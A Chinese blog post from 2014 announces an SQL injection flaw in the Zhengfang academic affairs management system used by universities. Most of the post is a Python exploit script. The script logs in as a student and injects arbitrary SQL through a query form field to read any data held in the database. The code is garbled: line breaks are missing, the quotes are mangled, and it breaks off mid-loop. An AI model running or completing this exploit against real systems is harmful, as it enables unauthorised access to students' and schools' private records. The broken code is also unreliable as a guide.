杭州正方教务管理系统SQL注射漏洞,可查询任意数据并附带exp

二月 6th, 2014 by admin

#! /usr/bin/env python# coding=utf-8import sysimport requestsurl_root = “http://***.com/”url_login = “”url_query = “”cookie = {}def help():print “usage : “, sys.argv[0], “user”def login():global cookier = requests.get(url_root)t = r.headers["set-cookie"].split(”;”)[0].split(”=”)cookie[t[0]] = t[1]postdata = {}t = r.content[r.content.find("__viewstate") + 20:]t = t[:t.find(""")]postdata["__viewstate"] = tpostdata["textbox1"] = “****”postdata["textbox2"] = “****”postdata["button1"] = “”postdata["button2"] = ““postdata["radiobuttonlist1"] = “学生”.decode(”utf-8″).encode(”gbk”)r = requests.post(url_login, cookies=cookie, data=postdata)if len(r.history) == 0:print “登陆失败”sys.exit()def query(sql):global url_query, cookieresult = []header = {}header["referer"] = url_rootheader["host"] = “****”r = requests.get(url_query, cookies=cookie, headers=header)t = r.content.decode(”gbk”).encode(”utf-8″)t = t[t.find("__viewstate")+20:]t = t[:t.find(""")]postdata = {}postdata["__viewstate"] = tpostdata["dropdownlist5"] = “”postdata["dropdownlist3"] = “a.xh”postdata["dropdownlist4"] = “”postdata["dropdownlist1"] = “”postdata["dropdownlist2"] = “”postdata["button5"] = “查 询”.decode(”utf-8″).encode(”gbk”)postdata["textbox1"] = sqlr = requests.post(url_query, data=postdata, cookies=cookie, headers=header)t = r.content.decode(”gbk”).encode(”utf-8″)t = t[t.find("dropdownlist4"")+15:]t = t[:t.find("/select")]while true:pos = t.find(”"”)if pos == -1:breakt = t 相关阅读:

